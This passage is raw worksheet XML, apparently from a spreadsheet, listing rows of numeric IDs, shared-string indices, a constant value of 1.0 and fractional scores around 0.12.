      <c r="E17484" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17484" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17485" ht="15.75" customHeight="1">
      <c r="A17485" s="1">
        <v>5658.0</v>
      </c>
      <c r="B17485" s="2">
        <v>4.6289283E7</v>
      </c>
      <c r="C17485" s="2" t="s">
        <v>16858</v>
      </c>
      <c r="D17485" s="2">
        <v>1.0</v>
      </c>
      <c r="E17485" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17485" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17486" ht="15.75" customHeight="1">
      <c r="A17486" s="1">
        <v>6547.0</v>
      </c>
      <c r="B17486" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C17486" s="2" t="s">
        <v>16859</v>
      </c>
      <c r="D17486" s="2">
        <v>1.0</v>
      </c>
      <c r="E17486" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17486" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17487" ht="15.75" customHeight="1">
      <c r="A17487" s="1">
        <v>8740.0</v>
      </c>
      <c r="B17487" s="2">
        <v>5.4529441E7</v>
      </c>
      <c r="C17487" s="2" t="s">
        <v>16860</v>
      </c>
      <c r="D17487" s="2">
        <v>1.0</v>
      </c>
      <c r="E17487" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17487" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17488" ht="15.75" customHeight="1">
      <c r="A17488" s="1">
        <v>10709.0</v>
      </c>
      <c r="B17488" s="2">
        <v>1.4932235E7</v>
      </c>
      <c r="C17488" s="2" t="s">
        <v>16861</v>
      </c>
      <c r="D17488" s="2">
        <v>1.0</v>
      </c>
      <c r="E17488" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17488" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17489" ht="15.75" customHeight="1">
      <c r="A17489" s="1">
        <v>11814.0</v>
      </c>
      <c r="B17489" s="2">
        <v>2.4543248E7</v>
      </c>
      <c r="C17489" s="2" t="s">
        <v>16862</v>
      </c>
      <c r="D17489" s="2">
        <v>1.0</v>
      </c>
      <c r="E17489" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17489" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17490" ht="15.75" customHeight="1">
      <c r="A17490" s="1">
        <v>12071.0</v>
      </c>
      <c r="B17490" s="2">
        <v>2.662669E7</v>
      </c>
      <c r="C17490" s="2" t="s">
        <v>16863</v>
      </c>
      <c r="D17490" s="2">
        <v>1.0</v>
      </c>
      <c r="E17490" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17490" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17491" ht="15.75" customHeight="1">
      <c r="A17491" s="1">
        <v>13530.0</v>
      </c>
      <c r="B17491" s="2">
        <v>3.5584311E7</v>
      </c>
      <c r="C17491" s="2" t="s">
        <v>16864</v>
      </c>
      <c r="D17491" s="2">
        <v>1.0</v>
      </c>
      <c r="E17491" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17491" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17492" ht="15.75" customHeight="1">
      <c r="A17492" s="1">
        <v>16070.0</v>
      </c>
      <c r="B17492" s="2">
        <v>4.5306999E7</v>
      </c>
      <c r="C17492" s="2" t="s">
        <v>16865</v>
      </c>
      <c r="D17492" s="2">
        <v>1.0</v>
      </c>
      <c r="E17492" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17492" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17493" ht="15.75" customHeight="1">
      <c r="A17493" s="1">
        <v>16593.0</v>
      </c>
      <c r="B17493" s="2">
        <v>4.7002628E7</v>
      </c>
      <c r="C17493" s="2" t="s">
        <v>16866</v>
      </c>
      <c r="D17493" s="2">
        <v>1.0</v>
      </c>
      <c r="E17493" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17493" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17494" ht="15.75" customHeight="1">
      <c r="A17494" s="1">
        <v>19089.0</v>
      </c>
      <c r="B17494" s="2">
        <v>5.4658072E7</v>
      </c>
      <c r="C17494" s="2" t="s">
        <v>16867</v>
      </c>
      <c r="D17494" s="2">
        <v>1.0</v>
      </c>
      <c r="E17494" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17494" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17495" ht="15.75" customHeight="1">
      <c r="A17495" s="1">
        <v>20730.0</v>
      </c>
      <c r="B17495" s="2">
        <v>1.4702194E7</v>
      </c>
      <c r="C17495" s="2" t="s">
        <v>16868</v>
      </c>
      <c r="D17495" s="2">
        <v>1.0</v>
      </c>
      <c r="E17495" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17495" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17496" ht="15.75" customHeight="1">
      <c r="A17496" s="1">
        <v>20847.0</v>
      </c>
      <c r="B17496" s="2">
        <v>1.5667353E7</v>
      </c>
      <c r="C17496" s="2" t="s">
        <v>16869</v>
      </c>
      <c r="D17496" s="2">
        <v>1.0</v>
      </c>
      <c r="E17496" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17496" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17497" ht="15.75" customHeight="1">
      <c r="A17497" s="1">
        <v>20917.0</v>
      </c>
      <c r="B17497" s="2">
        <v>1.6374935E7</v>
      </c>
      <c r="C17497" s="2" t="s">
        <v>16870</v>
      </c>
      <c r="D17497" s="2">
        <v>1.0</v>
      </c>
      <c r="E17497" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17497" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17498" ht="15.75" customHeight="1">
      <c r="A17498" s="1">
        <v>21302.0</v>
      </c>
      <c r="B17498" s="2">
        <v>2.0647049E7</v>
      </c>
      <c r="C17498" s="2" t="s">
        <v>16871</v>
      </c>
      <c r="D17498" s="2">
        <v>1.0</v>
      </c>
      <c r="E17498" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17498" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17499" ht="15.75" customHeight="1">
      <c r="A17499" s="1">
        <v>21537.0</v>
      </c>
      <c r="B17499" s="2">
        <v>2.3511596E7</v>
      </c>
      <c r="C17499" s="2" t="s">
        <v>16872</v>
      </c>
      <c r="D17499" s="2">
        <v>1.0</v>
      </c>
      <c r="E17499" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17499" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17500" ht="15.75" customHeight="1">
      <c r="A17500" s="1">
        <v>21804.0</v>
      </c>
      <c r="B17500" s="2">
        <v>2.6749858E7</v>
      </c>
      <c r="C17500" s="2" t="s">
        <v>16873</v>
      </c>
      <c r="D17500" s="2">
        <v>1.0</v>
      </c>
      <c r="E17500" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17500" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17501" ht="15.75" customHeight="1">
      <c r="A17501" s="1">
        <v>22610.0</v>
      </c>
      <c r="B17501" s="2">
        <v>3.9965997E7</v>
      </c>
      <c r="C17501" s="2" t="s">
        <v>16874</v>
      </c>
      <c r="D17501" s="2">
        <v>1.0</v>
      </c>
      <c r="E17501" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17501" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17502" ht="15.75" customHeight="1">
      <c r="A17502" s="1">
        <v>23368.0</v>
      </c>
      <c r="B17502" s="2">
        <v>5.522177E7</v>
      </c>
      <c r="C17502" s="2" t="s">
        <v>16875</v>
      </c>
      <c r="D17502" s="2">
        <v>1.0</v>
      </c>
      <c r="E17502" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17502" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17503" ht="15.75" customHeight="1">
      <c r="A17503" s="1">
        <v>23648.0</v>
      </c>
      <c r="B17503" s="2">
        <v>6730584.0</v>
      </c>
      <c r="C17503" s="2" t="s">
        <v>16876</v>
      </c>
      <c r="D17503" s="2">
        <v>1.0</v>
      </c>
      <c r="E17503" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17503" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17504" ht="15.75" customHeight="1">
      <c r="A17504" s="1">
        <v>24650.0</v>
      </c>
      <c r="B17504" s="2">
        <v>1.1501569E7</v>
      </c>
      <c r="C17504" s="2" t="s">
        <v>16877</v>
      </c>
      <c r="D17504" s="2">
        <v>1.0</v>
      </c>
      <c r="E17504" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17504" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17505" ht="15.75" customHeight="1">
      <c r="A17505" s="1">
        <v>25552.0</v>
      </c>
      <c r="B17505" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C17505" s="2" t="s">
        <v>16878</v>
      </c>
      <c r="D17505" s="2">
        <v>1.0</v>
      </c>
      <c r="E17505" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17505" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17506" ht="15.75" customHeight="1">
      <c r="A17506" s="1">
        <v>25653.0</v>
      </c>
      <c r="B17506" s="2">
        <v>1.4523103E7</v>
      </c>
      <c r="C17506" s="2" t="s">
        <v>16879</v>
      </c>
      <c r="D17506" s="2">
        <v>1.0</v>
      </c>
      <c r="E17506" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17506" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17507" ht="15.75" customHeight="1">
      <c r="A17507" s="1">
        <v>25704.0</v>
      </c>
      <c r="B17507" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17507" s="2" t="s">
        <v>16880</v>
      </c>
      <c r="D17507" s="2">
        <v>1.0</v>
      </c>
      <c r="E17507" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17507" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17508" ht="15.75" customHeight="1">
      <c r="A17508" s="1">
        <v>26259.0</v>
      </c>
      <c r="B17508" s="2">
        <v>1.6374934E7</v>
      </c>
      <c r="C17508" s="2" t="s">
        <v>16881</v>
      </c>
      <c r="D17508" s="2">
        <v>1.0</v>
      </c>
      <c r="E17508" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17508" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17509" ht="15.75" customHeight="1">
      <c r="A17509" s="1">
        <v>26529.0</v>
      </c>
      <c r="B17509" s="2">
        <v>1.7705013E7</v>
      </c>
      <c r="C17509" s="2" t="s">
        <v>16882</v>
      </c>
      <c r="D17509" s="2">
        <v>1.0</v>
      </c>
      <c r="E17509" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17509" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17510" ht="15.75" customHeight="1">
      <c r="A17510" s="1">
        <v>27114.0</v>
      </c>
      <c r="B17510" s="2">
        <v>2.0647048E7</v>
      </c>
      <c r="C17510" s="2" t="s">
        <v>16871</v>
      </c>
      <c r="D17510" s="2">
        <v>1.0</v>
      </c>
      <c r="E17510" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17510" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17511" ht="15.75" customHeight="1">
      <c r="A17511" s="1">
        <v>27115.0</v>
      </c>
      <c r="B17511" s="2">
        <v>2.0647048E7</v>
      </c>
      <c r="C17511" s="2" t="s">
        <v>16883</v>
      </c>
      <c r="D17511" s="2">
        <v>1.0</v>
      </c>
      <c r="E17511" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17511" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17512" ht="15.75" customHeight="1">
      <c r="A17512" s="1">
        <v>28568.0</v>
      </c>
      <c r="B17512" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17512" s="2" t="s">
        <v>16884</v>
      </c>
      <c r="D17512" s="2">
        <v>1.0</v>
      </c>
      <c r="E17512" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17512" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17513" ht="15.75" customHeight="1">
      <c r="A17513" s="1">
        <v>29660.0</v>
      </c>
      <c r="B17513" s="2">
        <v>3.3908488E7</v>
      </c>
      <c r="C17513" s="2" t="s">
        <v>16885</v>
      </c>
      <c r="D17513" s="2">
        <v>1.0</v>
      </c>
      <c r="E17513" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17513" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17514" ht="15.75" customHeight="1">
      <c r="A17514" s="1">
        <v>30295.0</v>
      </c>
      <c r="B17514" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C17514" s="2" t="s">
        <v>16886</v>
      </c>
      <c r="D17514" s="2">
        <v>1.0</v>
      </c>
      <c r="E17514" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17514" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17515" ht="15.75" customHeight="1">
      <c r="A17515" s="1">
        <v>30907.0</v>
      </c>
      <c r="B17515" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C17515" s="2" t="s">
        <v>16887</v>
      </c>
      <c r="D17515" s="2">
        <v>1.0</v>
      </c>
      <c r="E17515" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17515" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17516" ht="15.75" customHeight="1">
      <c r="A17516" s="1">
        <v>31580.0</v>
      </c>
      <c r="B17516" s="2">
        <v>5126925.0</v>
      </c>
      <c r="C17516" s="2" t="s">
        <v>16888</v>
      </c>
      <c r="D17516" s="2">
        <v>1.0</v>
      </c>
      <c r="E17516" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17516" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17517" ht="15.75" customHeight="1">
      <c r="A17517" s="1">
        <v>32714.0</v>
      </c>
      <c r="B17517" s="2">
        <v>5966521.0</v>
      </c>
      <c r="C17517" s="2" t="s">
        <v>16889</v>
      </c>
      <c r="D17517" s="2">
        <v>1.0</v>
      </c>
      <c r="E17517" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17517" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17518" ht="15.75" customHeight="1">
      <c r="A17518" s="1">
        <v>33036.0</v>
      </c>
      <c r="B17518" s="2">
        <v>6730583.0</v>
      </c>
      <c r="C17518" s="2" t="s">
        <v>16876</v>
      </c>
      <c r="D17518" s="2">
        <v>1.0</v>
      </c>
      <c r="E17518" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17518" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17519" ht="15.75" customHeight="1">
      <c r="A17519" s="1">
        <v>33083.0</v>
      </c>
      <c r="B17519" s="2">
        <v>6934952.0</v>
      </c>
      <c r="C17519" s="2" t="s">
        <v>16889</v>
      </c>
      <c r="D17519" s="2">
        <v>1.0</v>
      </c>
      <c r="E17519" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17519" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17520" ht="15.75" customHeight="1">
      <c r="A17520" s="1">
        <v>33096.0</v>
      </c>
      <c r="B17520" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17520" s="2" t="s">
        <v>16890</v>
      </c>
      <c r="D17520" s="2">
        <v>1.0</v>
      </c>
      <c r="E17520" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17520" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="17521" ht="15.75" customHeight="1">
      <c r="A17521" s="1">
        <v>24199.0</v>
      </c>
      <c r="B17521" s="2">
        <v>1.0302447E7</v>
      </c>
      <c r="C17521" s="2" t="s">
        <v>16891</v>
      </c>
      <c r="D17521" s="2">
        <v>1.0</v>
      </c>
      <c r="E17521" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17521" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="17522" ht="15.75" customHeight="1">
      <c r="A17522" s="1">
        <v>30080.0</v>
      </c>
      <c r="B17522" s="2">
        <v>3627631.0</v>
      </c>
      <c r="C17522" s="2" t="s">
        <v>16892</v>
      </c>
      <c r="D17522" s="2">
        <v>1.0</v>
      </c>
      <c r="E17522" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17522" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="17523" ht="15.75" customHeight="1">
      <c r="A17523" s="1">
        <v>33703.0</v>
      </c>
      <c r="B17523" s="2">
        <v>8472762.0</v>
      </c>
      <c r="C17523" s="2" t="s">
        <v>16893</v>
      </c>
      <c r="D17523" s="2">
        <v>1.0</v>
      </c>
      <c r="E17523" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17523" s="2">
        <v>0.121283255086072</v>
      </c>
    </row>
    <row r="17524" ht="15.75" customHeight="1">
      <c r="A17524" s="1">
        <v>10687.0</v>
      </c>
      <c r="B17524" s="2">
        <v>1.4701873E7</v>
      </c>
      <c r="C17524" s="2" t="s">
        <v>16894</v>
      </c>
      <c r="D17524" s="2">
        <v>1.0</v>
      </c>
      <c r="E17524" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17524" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="17525" ht="15.75" customHeight="1">
      <c r="A17525" s="1">
        <v>22157.0</v>
      </c>
      <c r="B17525" s="2">
        <v>3.1333075E7</v>
      </c>
      <c r="C17525" s="2" t="s">
        <v>16895</v>
      </c>
      <c r="D17525" s="2">
        <v>1.0</v>
      </c>
      <c r="E17525" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17525" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="17526" ht="15.75" customHeight="1">
      <c r="A17526" s="1">
        <v>33006.0</v>
      </c>
      <c r="B17526" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C17526" s="2" t="s">
        <v>16896</v>
      </c>
      <c r="D17526" s="2">
        <v>1.0</v>
      </c>
      <c r="E17526" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17526" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="17527" ht="15.75" customHeight="1">
      <c r="A17527" s="1">
        <v>5368.0</v>
      </c>
      <c r="B17527" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C17527" s="2" t="s">
        <v>16897</v>
      </c>
      <c r="D17527" s="2">
        <v>1.0</v>
      </c>
      <c r="E17527" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17527" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="17528" ht="15.75" customHeight="1">
      <c r="A17528" s="1">
        <v>19859.0</v>
      </c>
      <c r="B17528" s="2">
        <v>5.7152618E7</v>
      </c>
      <c r="C17528" s="2" t="s">
        <v>16898</v>
      </c>
      <c r="D17528" s="2">
        <v>1.0</v>
      </c>
      <c r="E17528" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17528" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="17529" ht="15.75" customHeight="1">
      <c r="A17529" s="1">
        <v>18351.0</v>
      </c>
      <c r="B17529" s="2">
        <v>5.2486624E7</v>
      </c>
      <c r="C17529" s="2" t="s">
        <v>16899</v>
      </c>
      <c r="D17529" s="2">
        <v>1.0</v>
      </c>
      <c r="E17529" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17529" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="17530" ht="15.75" customHeight="1">
      <c r="A17530" s="1">
        <v>26023.0</v>
      </c>
      <c r="B17530" s="2">
        <v>1.5384054E7</v>
      </c>
      <c r="C17530" s="2" t="s">
        <v>16900</v>
      </c>
      <c r="D17530" s="2">
        <v>1.0</v>
      </c>
      <c r="E17530" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17530" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="17531" ht="15.75" customHeight="1">
      <c r="A17531" s="1">
        <v>25083.0</v>
      </c>
      <c r="B17531" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C17531" s="2" t="s">
        <v>16901</v>
      </c>
      <c r="D17531" s="2">
        <v>1.0</v>
      </c>
      <c r="E17531" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17531" s="2">
        <v>0.1202321724709785</v>
      </c>
    </row>
    <row r="17532" ht="15.75" customHeight="1">
      <c r="A17532" s="1">
        <v>6549.0</v>
      </c>
      <c r="B17532" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C17532" s="2" t="s">
        <v>16902</v>
      </c>
      <c r="D17532" s="2">
        <v>1.0</v>
      </c>
      <c r="E17532" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17532" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17533" ht="15.75" customHeight="1">
      <c r="A17533" s="1">
        <v>21203.0</v>
      </c>
      <c r="B17533" s="2">
        <v>1.9511232E7</v>
      </c>
      <c r="C17533" s="2" t="s">
        <v>16903</v>
      </c>
      <c r="D17533" s="2">
        <v>1.0</v>
      </c>
      <c r="E17533" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17533" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17534" ht="15.75" customHeight="1">
      <c r="A17534" s="1">
        <v>22203.0</v>
      </c>
      <c r="B17534" s="2">
        <v>3.2035318E7</v>
      </c>
      <c r="C17534" s="2" t="s">
        <v>16904</v>
      </c>
      <c r="D17534" s="2">
        <v>1.0</v>
      </c>
      <c r="E17534" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17534" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17535" ht="15.75" customHeight="1">
      <c r="A17535" s="1">
        <v>28380.0</v>
      </c>
      <c r="B17535" s="2">
        <v>2.6108488E7</v>
      </c>
      <c r="C17535" s="2" t="s">
        <v>16905</v>
      </c>
      <c r="D17535" s="2">
        <v>1.0</v>
      </c>
      <c r="E17535" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17535" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17536" ht="15.75" customHeight="1">
      <c r="A17536" s="1">
        <v>28577.0</v>
      </c>
      <c r="B17536" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17536" s="2" t="s">
        <v>16906</v>
      </c>
      <c r="D17536" s="2">
        <v>1.0</v>
      </c>
      <c r="E17536" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17536" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17537" ht="15.75" customHeight="1">
      <c r="A17537" s="1">
        <v>31697.0</v>
      </c>
      <c r="B17537" s="2">
        <v>5.1967394E7</v>
      </c>
      <c r="C17537" s="2" t="s">
        <v>16907</v>
      </c>
      <c r="D17537" s="2">
        <v>1.0</v>
      </c>
      <c r="E17537" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17537" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="17538" ht="15.75" customHeight="1">
      <c r="A17538" s="1">
        <v>1093.0</v>
      </c>
      <c r="B17538" s="2">
        <v>2.3769819E7</v>
      </c>
      <c r="C17538" s="2" t="s">
        <v>16908</v>
      </c>
      <c r="D17538" s="2">
        <v>1.0</v>
      </c>
      <c r="E17538" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17538" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="17539" ht="15.75" customHeight="1">
      <c r="A17539" s="1">
        <v>4503.0</v>
      </c>
      <c r="B17539" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C17539" s="2" t="s">
        <v>16909</v>
      </c>
      <c r="D17539" s="2">
        <v>1.0</v>
      </c>
      <c r="E17539" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17539" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17540" ht="15.75" customHeight="1">
      <c r="A17540" s="1">
        <v>13327.0</v>
      </c>
      <c r="B17540" s="2">
        <v>3.4624098E7</v>
      </c>
      <c r="C17540" s="2" t="s">
        <v>16910</v>
      </c>
      <c r="D17540" s="2">
        <v>1.0</v>
      </c>
      <c r="E17540" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17540" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17541" ht="15.75" customHeight="1">
      <c r="A17541" s="1">
        <v>27654.0</v>
      </c>
      <c r="B17541" s="2">
        <v>2.2832679E7</v>
      </c>
      <c r="C17541" s="2" t="s">
        <v>16834</v>
      </c>
      <c r="D17541" s="2">
        <v>1.0</v>
      </c>
      <c r="E17541" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17541" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17542" ht="15.75" customHeight="1">
      <c r="A17542" s="1">
        <v>27697.0</v>
      </c>
      <c r="B17542" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C17542" s="2" t="s">
        <v>16911</v>
      </c>
      <c r="D17542" s="2">
        <v>1.0</v>
      </c>
      <c r="E17542" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17542" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17543" ht="15.75" customHeight="1">
      <c r="A17543" s="1">
        <v>34083.0</v>
      </c>
      <c r="B17543" s="2">
        <v>9680062.0</v>
      </c>
      <c r="C17543" s="2" t="s">
        <v>16912</v>
      </c>
      <c r="D17543" s="2">
        <v>1.0</v>
      </c>
      <c r="E17543" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17543" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17544" ht="15.75" customHeight="1">
      <c r="A17544" s="1">
        <v>34182.0</v>
      </c>
      <c r="B17544" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C17544" s="2" t="s">
        <v>16913</v>
      </c>
      <c r="D17544" s="2">
        <v>1.0</v>
      </c>
      <c r="E17544" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17544" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="17545" ht="15.75" customHeight="1">
      <c r="A17545" s="1">
        <v>11604.0</v>
      </c>
      <c r="B17545" s="2">
        <v>2.3022084E7</v>
      </c>
      <c r="C17545" s="2" t="s">
        <v>16914</v>
      </c>
      <c r="D17545" s="2">
        <v>1.0</v>
      </c>
      <c r="E17545" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17545" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17546" ht="15.75" customHeight="1">
      <c r="A17546" s="1">
        <v>13183.0</v>
      </c>
      <c r="B17546" s="2">
        <v>3.4041417E7</v>
      </c>
      <c r="C17546" s="2" t="s">
        <v>16915</v>
      </c>
      <c r="D17546" s="2">
        <v>1.0</v>
      </c>
      <c r="E17546" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17546" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17547" ht="15.75" customHeight="1">
      <c r="A17547" s="1">
        <v>13846.0</v>
      </c>
      <c r="B17547" s="2">
        <v>3.6842258E7</v>
      </c>
      <c r="C17547" s="2" t="s">
        <v>16916</v>
      </c>
      <c r="D17547" s="2">
        <v>1.0</v>
      </c>
      <c r="E17547" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17547" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17548" ht="15.75" customHeight="1">
      <c r="A17548" s="1">
        <v>15872.0</v>
      </c>
      <c r="B17548" s="2">
        <v>4.4503531E7</v>
      </c>
      <c r="C17548" s="2" t="s">
        <v>16917</v>
      </c>
      <c r="D17548" s="2">
        <v>1.0</v>
      </c>
      <c r="E17548" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17548" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17549" ht="15.75" customHeight="1">
      <c r="A17549" s="1">
        <v>16255.0</v>
      </c>
      <c r="B17549" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C17549" s="2" t="s">
        <v>16918</v>
      </c>
      <c r="D17549" s="2">
        <v>1.0</v>
      </c>
      <c r="E17549" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17549" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17550" ht="15.75" customHeight="1">
      <c r="A17550" s="1">
        <v>26316.0</v>
      </c>
      <c r="B17550" s="2">
        <v>1.6651853E7</v>
      </c>
      <c r="C17550" s="2" t="s">
        <v>16919</v>
      </c>
      <c r="D17550" s="2">
        <v>1.0</v>
      </c>
      <c r="E17550" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17550" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17551" ht="15.75" customHeight="1">
      <c r="A17551" s="1">
        <v>33404.0</v>
      </c>
      <c r="B17551" s="2">
        <v>7717007.0</v>
      </c>
      <c r="C17551" s="2" t="s">
        <v>16920</v>
      </c>
      <c r="D17551" s="2">
        <v>1.0</v>
      </c>
      <c r="E17551" s="3" t="s">
